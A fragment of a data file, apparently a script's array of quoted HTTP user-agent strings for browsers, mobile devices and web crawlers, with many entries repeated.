'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)',
'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)',
'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; 
ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! 
Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) 
AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! 
Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) 
Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 